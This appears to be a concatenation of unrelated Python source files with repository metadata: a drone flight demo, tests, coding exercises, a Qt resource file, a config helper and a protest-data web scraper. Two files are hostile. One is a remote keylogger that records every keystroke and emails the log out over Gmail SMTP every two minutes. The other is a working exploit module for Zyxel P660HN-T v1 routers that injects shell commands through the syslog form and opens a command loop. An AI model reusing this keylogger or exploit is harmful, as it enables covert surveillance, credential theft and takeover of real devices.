setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first
i = 0
while not rospy.is_shutdown():
x = radius * cos(i*2*pi/sides) + offset_x
y = radius * sin(i*2*pi/sides) + offset_y
z = offset_z
wait = False
delay = 0
if (i == 0 or i == sides):
# Let it reach the setpoint.
wait = True
delay = 5
setpoint.set(x, y, z, delay, wait)
i = i + 1
rate.sleep()
if (i > sides):
print "Fly home"
setpoint.set(0.0, 0.0, 10.0, 5)
break
# Simulate a slow landing.
setpoint.set(0.0, 0.0, 8.0, 5)
setpoint.set(0.0, 0.0, 3.0, 5)
setpoint.set(0.0, 0.0, 2.0, 2)
setpoint.set(0.0, 0.0, 1.0, 2)
setpoint.set(0.0, 0.0, 0.0, 2)
setpoint.set(0.0, 0.0, -0.2, 2)
print "Bye!"
if __name__ == '__main__':
try:
setpoint_demo()
except rospy.ROSInterruptException:
pass
| 1.632813 | 2 |
tests/models/test_models.py | kynk94/torch-firewood | 1 | 12796643 | import importlib
import sys
import pytest
from firewood import models
gan = ["gan." + model for model in models.gan.__all__]
semantic_segmentation = [
"semantic_segmentation." + model
for model in models.semantic_segmentation.__all__
]
all_models = gan + semantic_segmentation
@pytest.mark.parametrize("model", all_models)
def test_models(model: str) -> None:
module = importlib.import_module("firewood.models." + model)
sys.argv = [""]
module.main()
| 2.0625 | 2 |
keylogger_remoto.py | HerikCarvalho/keylogger_remoto_py | 0 | 12796644 | # keylogger_remoto_py
#Um Keylogger Remoto em Python
import keyboard # para keylogs
import smtplib # para enviar email usando o protocolo SMTP (gmail)
# O semáforo é para bloquear o segmento atual
# O temporizador é para executar um método após uma quantidade de tempo "intervalo"
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 120 # 02 minutes
EMAIL_ADDRESS = "<seu_endereço_de_email>"
EMAIL_PASSWORD = "<<PASSWORD>>"
class Keylogger:
def __init__(self, interval):
# passaremos SEND_REPORT_EVERY para o intervalo
self.interval = interval
# esta é a variável de string que contém o log de todos
# as teclas dentro de "self.interval"
self.log = ""
# para bloquear após definir o ouvinte on_release
self.semaphore = Semaphore(0)
def callback(self, event):
"""
Esse retorno de chamada é chamado sempre que um evento de teclado ocorre
(ou seja, quando uma chave é liberada neste exemplo)
"""
name = event.name
if len(name) > 1:
# não é um caractere, tecla especial (por exemplo, ctrl, alt etc.)
# maiúsculas com []
if name == "space":
# " "em vez de "espaço"
name = " "
elif name == "enter":
# adicione uma nova linha sempre que um ENTER for pressionado
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# substituir espaços por sublinhados
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# gerencia uma conexão com um servidor SMTP
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# conectar-se ao servidor SMTP como modo TLS (por segurança)
server.starttls()
# faça login na conta de email
server.login(email, password)
# envie a mensagem real
server.sendmail(email, email, message)
# finaliza a sessão
server.quit()
def report(self):
"""
Esta função é chamada todo "self.interval"
Ele basicamente envia keylogs e redefine a variável "self.log"
"""
if self.log:
# se houver algo no log, relate-o
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# pode imprimir em um arquivo, o que você quiser
# imprimir(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# inicie o keylogger
keyboard.on_release(callback=self.callback)
# comece a relatar os keylogs
self.report()
# bloquear o segmento atual
# desde on_release () não bloqueia o segmento atual
# se não o bloquearmos, quando executarmos o programa, nada acontecerá
# isso ocorre porque on_release () iniciará o ouvinte em um thread separado
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
#by Herik_Carvalho
| 3.375 | 3 |
Hash/keyword-rows.py | nishantml/Data-Structure-And-Algorithms | 0 | 12796645 | <filename>Hash/keyword-rows.py
"""
Given a List of words, return the words that can be typed using letters of alphabet on only one row's
of American keyboard like the image below.
Example:
Input: ["Hello", "Alaska", "Dad", "Peace"]
Output: ["Alaska", "Dad"]
Note:
You may use one character in the keyboard more than once.
You may assume the input string will only contain letters of alphabet.
"""
from typing import List
class Solution:
def findWords(self, words: List[str]) -> List[str]:
row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'];
row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l']
row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm']
inteligentWords = []
for word in words:
Hash = {'first': 0, 'second': 0, 'third': 0}
for letter in list(word.lower()):
if letter in row1:
Hash['first'] = Hash['first'] + 1
if letter in row2:
Hash['second'] = Hash['second'] + 1
if letter in row3:
Hash['third'] = Hash['third'] + 1
if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word):
inteligentWords.append(word)
return inteligentWords
| 4.375 | 4 |
strings/split_join.py | janbodnar/Python-Course | 13 | 12796646 | <reponame>janbodnar/Python-Course
#!/usr/bin/python
# split_join.py
nums = "1,5,6,8,2,3,1,9"
n = nums.split(",")
print (n)
m = ':'.join(n)
print (m)
| 3.8125 | 4 |
src/pangadfs_gui/resources.py | sansbacon/pangadfsGUI | 0 | 12796647 | <gh_stars>0
# Resource object code (Python 3)
# Created by: object code
# Created by: The Resource Compiler for Qt version 6.2.2
# WARNING! All changes made in this file will be lost!
from PySide6 import QtCore
qt_resource_data = b"\
\x00\x00\x03m\
\x89\
PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\
\x00\x00\x00\x19tEXtSoftware\
\x00Adobe ImageRead\
yq\xc9e<\x00\x00\x03\x0fIDATx\xda\x8c\
S[k\x13A\x14>;{K\xd3&\xbd\xc4Vk\
\xbc\xa4\x17\xac\xb4\xd6V#R+j\xa5*\x0aZh\
\xc1\xe2\x83\x0f>\xf5A,\x14\xfa'\x04\x1f\x14\x04\xa1\
\x05\x8b`|T\xa1*\xa8\xf5\x8a (j\xbd\xd2\x0b\
\x8dI\x89\xb76ib\x93\xddl2\xbb;\xeb\x99\x90\
*\xfa\xe4\xc0\xb7s8\xfb\x9d33\xdf9G\xe8\x1a\
[\x00\x10\x04XY\x0ec`\xdb6\x18\x9a\x06\x92,\
\x03\x11\xc5\x82_QU\xa4\x09#h>\xb3,+d\
\x99&X\x94\x82\x04\xff\xb9L\x0c \x84\x04\xd1\x0c\x16\
]!\xfe\xe1\x09\xce\x80\xe3\xd4\xe1\x9eFD\x10\xcf\x11\
sER\xd0q\x9c>\xdc\xb7:\xb6]\xc3\xf0f\xbd\
]\xeb\x827\x9f|\x19\xc2\x98B\x12\x09\xaf\xd3p\xfc\
@m}Z\xb7\xcd\xef\x89\x5c\xfd\xcc\xbc\xb6\x03y\x0f\
\x91\x10\x10\x05v\xaa\xb9\xde[\xb3\xda\xe7.w)\xa2\
K\x00AL$(\x1c\xe9X\x13\x1c\x7f:?\x84\x09\
\x12\x12\x7f\x0b*@\x1c\x13T\x9f[Q\xf7\xb4Vz\
\x1f\xbc\xf82\xecq\x8b\x81\xbd;\xfckL\x0a\xb2M\
\x1d0\xc1A\x0d\x1c\xa0\xd4\x82|^\x023\x9f/\x5c\
QB!\xc27&\xa2R\xc0_VV[U\xea\x8b\
\xccgVY9\xa3\xb5sg\xa0L\xd7lQ\x94\x80\
}\x8e%\xbeEb?\x93z\x96\x9a=\xdd\xcd\xc1\x1b\
\xf7>\xbeFA/\x88\xb2|Wh;\xfb\x81\xeb\xb0\
\x11\xdfzhU\xa5k\xbb\xb6\x9c9\xd6\xd2T[\xa9\
*\xaab3\xcby\xfb)6\xbb\x94\xcc>\x12\x08\x19\
\xc1\x0a]\xe6\xa7\xf2`YUC\x92\xa2\x80\x94I&\
-\xf4\x85\xd1;\x9aNX\xe3~\x7fEI\x9c\x09J\
&\xa5A6\xb6\x90\x89\xc7\xb50\x91\xa4A\x0c\xb6\x91\
w\x0e\xd1\x80\x87\x85h.\x07\x1c$\x9dL*\x88\xed\
Z*uQ)\x11\x1b\xf4\xba:\xcf$UA7(\
]H\xe9Y\xaf\xcf\xfb\x15\x83\x060\x9eW\xaa\x03Q\
\x8d\x09\xf6S\xc3\x00}y\x19DyK\xdf%\xaf\xa7\
d\xb0\xbaiC[\xba\xbd=\x10a.REL;\
\xf1\xf2\x83nl\xda<-\x06\xd6I.\xc1\xae\xa2Z\
6h\x199\xb6\xaf\x7fwcx2\xcc\x93P\xc6X\
T(=q\xf5\xd5\x91\xd3\xfd\xc1\xdbi\x05L,m\
\xb5m\x98t\xe2\xd1\x0f\x82?\xd5\xc3\x07\x96\x16\x05\x97\
D\xb0L\x1e\x19\xc0\x8bjEu\x80m\x15\x00\xb1k\
\xb7\xe6\x0a}`b;N\xe7\xf1\x08=\x99g\x91\xe8\
\xcf\xe5wS\x8b\x8c\xd2+n\x8f'\x9a\xbds\xbf\xdb\
\xd7\xd4Xn\xae\xf5\xbb-O\x99\x92#\x12a\x98\xcc\
`\x00\xb4XFA\xec\x19\x19\xc1\xeb\xb4\xa3\x1dG\xbc\
G\x85\xaf\x93T\xf8\xb5\xea.\x01\xf0mjD\xf1v\
\xa1\x9f\xbf\xbf\x1cA\xd6\x0f\x9cl\x8c\x8d\x86\xe6\x907\
\x8e\xe2>\x16\x84\xa6\xa38A\x7fz\xde\x99\xbd\xfd\xd7\
\x0c\xc8-\xbd\xbfm\xe4\x9e/p\x123\xe3l\xfa\xd6\
c{q\x8a7a\x012\x1f8\x84\xab\x08\xb5\xb8s\
\xbf\xb8\x92\x80t\x0e\x1f\x84\x5cj\x96\xbd\x19\xe3\xf3\x92\
A\x18+\x09H\x91(\xfd\x03R\xc4\xcab|0\x11\
\x5c\x00\xca\xed_\x02\x0c\x00\xa6=o\xdb2\xe1%J\
\x00\x00\x00\x00IEND\xaeB`\x82\
\x00\x00\x02\xdb\
\x89\
PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\
\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\
\x00\x00\x00\x19tEXtSoftware\
\x00Adobe ImageRead\
yq\xc9e<\x00\x00\x02}IDATx\xda\x8c\
\x93\xdfK\x93Q\x18\xc7\xbf\xef\xd9\xd9t3s\xad\x9c\
LG\xcd\xb5i\x18\x85\x91\xd4\x8d\x10\x98AR\x17A\
^ue\x17\x15A\x7fB\x16DPDw]G\xd7\
F\x91A\xdeu\x11\x95\x11\x1a\x94\x09\x22-\x86\xe9\x9c\
,$+u\x93\xf7=?z\xce\xd9\xa6.\x08:p\
8\xcf\xf9\xf1|\xdf\xcf\xf7<\xefq&\xef\xc06\xc7\
\xc1E\x1a\x12\xf8\xbf6\xa75\x1e\xdd\xdb\xb8\x09\xae+\
+\xb4\x90\xec\x1a\xbc{}=?\x0bGi\x84\xf6\xb4\
#\x18\x8e\x83\xf9\x02\xb5\xa9\x9cc\xf2\xe1\x85\xdb#\xee\
Py\xaa\xd4\xe6\x16k\x88\xa6)q?\xdc\xd5\x02\xd6\
\xf3_0\xfe\xf6\x0d\x9c\xc4\x99\x9a|\xc7\xef\xc7\x07\xef\
\xf4\xd1y\xb5\xef2M\x97\xb8\xd4[\x02J\x0ah\xcf\
\x03\xaf\x0b#\xdc\xd9\x8bX\xc1A{\xef%\x84B!\
0\xc66\x0f\xf6\x9f\xbc6@\xc3\xc0\xf9\xe1\xe1\xab\x5c\
n\x11\xf8\xb4\x940\xdd6!\xf0b\xa9\x84\xb1\xd7?\
\xa1\xd4\x0f\xf0]QH\xc2\x95\xb4\xafh|\xdf\xd7\x04\
%\xa5\xc3\xab\xe7\xab\x02\x86\xc2\xe2\xd0\x17\xd5\xc6:N\
\xb43J\xd2x\xf7\x0b\xe8K\x18\x01\x85\x97YX\x11\
!\x84\xc3\xc56\x02%=H\xe1U\x0c9h\xd0.\
\xd6\x96V\xa0\xe9p\x7f\x84C\x16\x94%\xec\x0f\x92\x90\
\xdea\x04\xd8v\x0b\x5c\x09\x22\x10e\x02\x87\xf9\x10T\
.\xae\xa4\x1a\xed|qm\x05=\x1d\x1d6\x1e\x9f\x9e\
&\x818\x84\xe71.j,\x88-\x0b\xd2G\xb8\x02\
3\xb9\x9c\xf1\x8a\xb6\xb66L\xcc\xce\xda;\xb0Wd\
,X\x81\x1a\x02\x0f\xaabA\x99;\xa0\xc3\xe9\xd6V\
;\xff^,\xe2H:m\xe3\x89\x99\x19\x22\xd0e\x81\
\xcf\xdf\x80\xaex\xe5\x0e\x08_\x8a\xea%\xfa\xac\x9dL\
>o\x85b\xb1\x18>f2\x9b\x04\xa6\x22\x1e\x09\xb0\
\x1b#\x80\x11\xf1\x04\x02\xcaZ\xf0*\xdd\xc4\x0a\xc9\x96\
\x16\xa4\x88b\xc3uq(\x99Dw\x85\xc2\x10X\x01\
\x8a\x83\xb7\x9e \xf2\xbb\x84\x9d\x9a\x12\x94-e\xf9\x7f\
0%\xcb\x16\x0a\xf8J\x14\xa6Mg\xb3\xf8D\x14U\
\x01\xb7T\xaa\xe3\x14\xd7S\x8fL\xcd!\x9fz\xf5t\
5q\xa0\xa7\xbeiw\xccoJ\xd7\xecW\x8867\
\xdb\x84\x16\xb2P\xf3$\xe8\x97^Y^np\xaa\x0b\
\xa7\x0e\x03\x83\xc7q\x8e\xde\xd1@$\x1a\xefL\x1d<\
\x96x\xfcl\x8c=\x98\xda\xfb\x9c\x05\x02%\x871\xf9\
\xf7\x93T\xc5\xe2\x02\xafY\xd0\x18\xa5\xaa\x8c.\xe6r\
\xdd\x0b\xf3\xb9\xb3\x8d\x1c\xb1b&s\x9f\xb6\xbc\x7f<\
\xeb\xd2\x1f\x01\x06\x00\xd2\x97^|\x9f\xc2\xaf\xc8\x00\x00\
\x00\x00IEND\xaeB`\x82\
"
qt_resource_name = b"\
\x00\x05\
\x00o\xa6S\
\x00i\
\x00c\x00o\x00n\x00s\
\x00\x0b\
\x0d\xd7\xa0\xc7\
\x00s\
\x00h\x00u\x00f\x00f\x00l\x00e\x00.\x00p\x00n\x00g\
\x00\x0c\
\x07\x90\xdd\xa7\
\x00o\
\x00p\x00e\x00n\x00p\x00r\x00o\x00j\x00.\x00p\x00n\x00g\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00,\x00\x00\x00\x00\x00\x01\x00\x00\x03q\
\x00\x00\x01}\xe0D>B\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01}\xe0D>B\
"
def qInitResources():
QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 1.28125 | 1 |
apis_configs/config_helper.py | yewu/icdc-demo | 2 | 12796648 | import json
import os
# make it easy to change this for testing
XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/')
def default_search_folders(app_name):
'''
Return the list of folders to search for configuration files
'''
return [
'%s/cdis/%s' % (XDG_DATA_HOME, app_name),
'/usr/share/cdis/%s' % app_name,
'/var/www/%s' % app_name
]
def find_paths(file_name,app_name,search_folders=None):
'''
Search the given folders for file_name
search_folders defaults to default_search_folders if not specified
return the first path to file_name found
'''
search_folders = search_folders or default_search_folders(app_name)
possible_files = [ os.path.join(folder, file_name) for folder in search_folders ]
return [ path for path in possible_files if os.path.exists(path) ]
def load_json(file_name,app_name,search_folders=None):
'''
json.load(file_name) after finding file_name in search_folders
return the loaded json data or None if file not found
'''
actual_files = find_paths(file_name, app_name, search_folders)
if not actual_files:
return None
with open(actual_files[0], 'r') as reader:
return json.load(reader)
| 2.703125 | 3 |
maza/modules/exploits/routers/zyxel/p660hn_t_v1_rce.py | ArturSpirin/maza | 2 | 12796649 | from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "Zyxel P660HN-T v1 RCE",
"description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. "
"If the target is vulnerable it allows to execute commands on operating system level.",
"authors": (
"<NAME> <pedrib[at]gmail.com>", # vulnerability discovery
"<NAME> <marcin[at]threat9.com>", # routersploit module
),
"references": (
"http://seclists.org/fulldisclosure/2017/Jan/40",
"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"https://blogs.securiteam.com/index.php/archives/2910",
),
"devices": (
"Zyxel P660HN-T v1",
),
}
target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
port = OptPort(80, "Target port")
def run(self):
if self.check():
print_success("Target appears to be vulnerable")
print_status("Invoking command loop...")
print_status("It is blind command injection - response is not available")
shell(self, architecture="mipsbe")
else:
print_error("Target seems to be not vulnerable")
def execute(self, cmd):
payload = ";{};#".format(cmd)
data = {
"remote_submit_Flag": "1",
"remote_syslog_Flag": "1",
"RemoteSyslogSupported": "1",
"LogFlag": "0",
"remote_host": payload,
"remoteSubmit": "Save"
}
self.http_request(
method="POST",
path="/cgi-bin/ViewLog.asp",
data=data
)
return ""
@mute
def check(self):
response = self.http_request(
method="GET",
path="/cgi-bin/authorize.asp",
)
if response is None:
return False
if "ZyXEL P-660HN-T1A" in response.text:
return True
return False
| 2.328125 | 2 |
Code/webscrape.py | tcampbell3/Black-Lives-Matter-Lethal-Force | 1 | 12796650 | #Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s
#How to open python in command prompt:
#1) Shift+Right Click -> open command prompt
#2) type "conda activate"
#3) type "python"
#To run the python script, type the following line into the command prompt:
#python "C:\Users\travi\Dropbox\Police Killings\Do Files\webscrape.py"
# import packages
import time
import itertools
import csv
import codecs
from bs4 import BeautifulSoup
from selenium import webdriver
from time import sleep
# access website through automated chrome
chrome_path=r"C:\Users\travi\Anaconda3\Lib\site-packages\selenium\chromedriver.exe"
driver = webdriver.Chrome(chrome_path)
driver.get('https://elephrame.com/textbook/BLM')
sleep(2)
# save csv
filename = "../Data/BLM Protests/protests_scrape.csv"
f = codecs.open(filename, encoding='utf-8', mode='w+')
headers = "Location, Date, Subject, Description, Participants\n"
f.write(headers)
# loop clicks over all pages
page_new = 1
pagenum = -1
while(pagenum < page_new):
#click to next page
if pagenum > -1:
driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[4]""").click()
# don't overflow website
sleep(2)
#update page numbers for while statement
page_new = driver.find_element_by_xpath("""//*[@id="blm-results"]/div[1]/ul/li[3]/input""").get_attribute("value")
page_new = int(page_new, 10) #coverts from string to numeric
pagenum = pagenum + 1
# append data from this click
locations = driver.find_elements_by_class_name("item-protest-location")
dates = driver.find_elements_by_class_name("protest-start")
participants = driver.find_elements_by_class_name("item-protest-participants")
descriptions = driver.find_elements_by_class_name("item-protest-description")
subjects = driver.find_elements_by_class_name("item-protest-subject")
for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):
print(a.text, b.text, c.text, d.text, e.text)
f.write(a.text.replace(",", "|") + "," + b.text.replace(",", "|") + "," + c.text.replace(",", "|").replace("Subject(s): ","") + "," + d.text.replace(",", "|").replace("Description: ","") + "," + e.text + "\n")
# close browser
driver.quit()
# close csv file
f.close() | 3.71875 | 4 |
Subsets and Splits